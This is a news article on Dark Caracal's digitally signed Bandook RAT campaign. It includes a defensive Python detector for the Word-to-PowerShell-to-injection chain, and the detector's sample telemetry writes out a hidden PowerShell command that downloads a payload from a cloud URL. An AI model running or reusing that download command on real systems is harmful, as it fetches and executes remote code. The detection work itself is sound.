Digitally Signed Bandook Malware Once Again Targets Multiple Sectors

A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of attacks against a multitude of industries with a retooled version of a 13-year-old backdoor Trojan.

Check Point Research called out hackers affiliated with a group named Dark Caracal in a new report published yesterday for their efforts to deploy “dozens of digitally signed variants” of the Bandook Windows Trojan over the past year, thus once again “reigniting interest in this old malware family.”

The different verticals singled out by the threat actor include government, financial, energy, food industry, healthcare, education, IT, and legal institutions located in Chile, Cyprus, Germany, Indonesia, Italy, Singapore, Switzerland, Turkey, and the US.

The unusually large variety of targeted markets and locations “reinforces a previous hypothesis that the malware is not developed in-house and used by a single entity, but is part of an offensive infrastructure sold by a third party to governments and threat actors worldwide, to facilitate offensive cyber operations,” the researchers said.

Dark Caracal’s extensive use of the Bandook RAT to conduct espionage on a global scale was first documented by the Electronic Frontier Foundation (EFF) and Lookout in early 2018, with the group blamed for the theft of enterprise intellectual property and personally identifiable information from hundreds of victims spanning over 21 countries.

The prolific group, which has operated at least since 2012, has been linked to the Lebanese General Directorate of General Security (GDGS), making it a nation-state-level advanced persistent threat.

The concurrent use of the same malware infrastructure by different groups for seemingly unrelated campaigns led the EFF and Lookout to surmise that the APT actor “either uses or manages the infrastructure found to be hosting a number of widespread, global cyberespionage campaigns.”

Now the same group is back with a new strain of Bandook that includes additional efforts to thwart detection and analysis, per Check Point Research.

A Three-Stage Infection Chain

The infection chain is a three-stage process that begins with a lure Microsoft Word document (e.g. “Certified documents.docx”) delivered inside a ZIP file. When the document is opened, it downloads malicious macros, which in turn drop and execute a second-stage PowerShell script that was stored encrypted inside the original Word document.

In the final stage of the attack, this PowerShell script downloads encoded executable parts from cloud storage services such as Dropbox or Bitbucket in order to assemble the Bandook loader, which then takes on the job of injecting the RAT into a new Internet Explorer process.
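The chain above maps cleanly onto host telemetry: an Office process as the direct parent of PowerShell, a PowerShell command line naming a cloud-storage host, and a descendant of that PowerShell opening a remote thread in iexplore.exe. The following Python is an added example of correlating those three observations, not Check Point’s or the operators’ code. The event records are a constructed approximation of Sysmon Event ID 1 (ProcessCreate) and Event ID 8 (CreateRemoteThread); the field names, pids, the `loader.exe` path and the Dropbox URL in the sample command line are assumptions. The loader’s signing status is carried through so the rule can show that a validly signed loader (as in the Certum-signed samples discussed below) still triggers.

```python
"""Correlate process telemetry into the Bandook-style three-stage chain.

Added example; not Check Point's or the operators' code. Events are a
constructed approximation of Sysmon Event ID 1 (ProcessCreate) and
Event ID 8 (CreateRemoteThread); the field names are assumptions.
"""
import re
from collections import defaultdict

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Cloud storage hosts reported as second-stage hosting for the loader parts.
CLOUD_STAGING = re.compile(
    r"\b(dropbox\.com|dropboxusercontent\.com|bitbucket\.org)\b", re.I)
INJECTION_TARGETS = {"iexplore.exe"}


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """Index ProcessCreate events by pid and collect parent -> children."""
    by_pid, children = {}, defaultdict(list)
    for ev in events:
        if ev["event"] == "ProcessCreate":
            by_pid[ev["pid"]] = ev
            children[ev["ppid"]].append(ev["pid"])
    return by_pid, children


def descendants(pid, children):
    """Every pid below `pid` in the tree (iterative depth-first walk)."""
    seen, stack = set(), list(children.get(pid, []))
    while stack:
        p = stack.pop()
        if p not in seen:
            seen.add(p)
            stack.extend(children.get(p, []))
    return seen


def detect_bandook_chain(events):
    """Return one alert per PowerShell process that completes all three stages.

    Stage 1: an Office process is the direct parent of PowerShell.
    Stage 2: that PowerShell's command line names a cloud-storage host.
    Stage 3: PowerShell or one of its descendants (the assembled loader)
             creates a remote thread in a browser process.
    The loader's code-signing status is recorded but never suppresses the
    alert: validly signed loaders were part of the reported campaign.
    """
    by_pid, children = build_tree(events)
    remote_threads = [e for e in events if e["event"] == "CreateRemoteThread"]
    alerts = []
    for ps in by_pid.values():
        if _basename(ps["image"]) not in SCRIPT_HOSTS:
            continue
        parent = by_pid.get(ps["ppid"])
        if parent is None or _basename(parent["image"]) not in OFFICE_IMAGES:
            continue
        staging = CLOUD_STAGING.search(ps.get("cmdline", ""))
        if staging is None:
            continue
        lineage = descendants(ps["pid"], children) | {ps["pid"]}
        for rt in remote_threads:
            if rt["pid"] in lineage and _basename(rt["target_image"]) in INJECTION_TARGETS:
                loader = by_pid.get(rt["pid"], ps)
                alerts.append({
                    "office_pid": parent["pid"],
                    "script_pid": ps["pid"],
                    "staging_host": staging.group(1).lower(),
                    "loader_image": loader["image"],
                    "loader_signed": bool(loader.get("signed")),
                    "injected_into": _basename(rt["target_image"]),
                })
    return alerts


# Constructed sample telemetry (not real campaign data). The lure file name
# follows the article; pids, the URL path and the loader.exe path are invented.
_WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "pid": 5200, "ppid": 4100, "image": _WORD, "signed": True,
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\Certified documents.docx"'},
    {"event": "ProcessCreate", "pid": 5300, "ppid": 5200, "image": _PS, "signed": True,
     "cmdline": "powershell.exe -w hidden -ep bypass -c "
                "\"(New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/x1/p1.txt?dl=1')\""},
    # Loader assembled by the script: carries a valid signature, still malicious.
    {"event": "ProcessCreate", "pid": 5400, "ppid": 5300, "signed": True,
     "image": r"C:\Users\u\AppData\Local\Temp\loader.exe", "cmdline": "loader.exe"},
    {"event": "ProcessCreate", "pid": 5500, "ppid": 5400, "image": _IE, "cmdline": "iexplore.exe", "signed": True},
    {"event": "CreateRemoteThread", "pid": 5400, "target_pid": 5500, "target_image": _IE},
]
# Word launching a local admin script, no cloud fetch, no injection: must not alert.
BENIGN_EVENTS = [
    {"event": "ProcessCreate", "pid": 6200, "ppid": 4100, "image": _WORD, "cmdline": "WINWORD.EXE", "signed": True},
    {"event": "ProcessCreate", "pid": 6300, "ppid": 6200, "image": _PS, "signed": True,
     "cmdline": r"powershell.exe -File C:\scripts\update-template.ps1"},
]

if __name__ == "__main__":
    for alert in detect_bandook_chain(SAMPLE_EVENTS):
        print(alert)
    print("benign alerts:", detect_bandook_chain(BENIGN_EVENTS))
```

The rule deliberately requires all three stages before alerting: Office spawning PowerShell on its own is noisy in many environments, and a remote thread into a browser is also produced by legitimate tooling. Requiring the cloud-storage fetch in between, and tying the injecting process to the PowerShell lineage rather than matching it globally, keeps the rule specific to this chain while still firing on a loader that carries a valid signature.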

The Bandook RAT, commercially available since 2007, comes with all the capabilities typically associated with backdoors: it establishes contact with a remote command-and-control server to receive additional commands, ranging from capturing screenshots to carrying out various file-related operations.

But according to the cybersecurity firm, the new variant of Bandook is a slimmed-down version of the malware with support for only 11 commands, whereas prior versions were known to support as many as 120 commands, suggesting the operators’ desire to reduce the malware’s footprint and evade detection when going after high-profile targets.

That’s not all. Not only were valid certificates issued by Certum used to sign this trimmed version of the malware executable; Check Point researchers also uncovered two more samples, full-fledged digitally signed and unsigned variants, which they believe are operated and sold by a single entity. For defenders, the practical consequence is that a valid Authenticode signature on an executable is not by itself evidence that the file is benign.

“Although not as capable, nor as practiced in operational security like some other offensive security vendors, the group behind the infrastructure in these attacks seems to improve over time, adding several layers of security, valid certificates and other techniques, to hinder detection and analysis of its operations,” the researchers concluded.
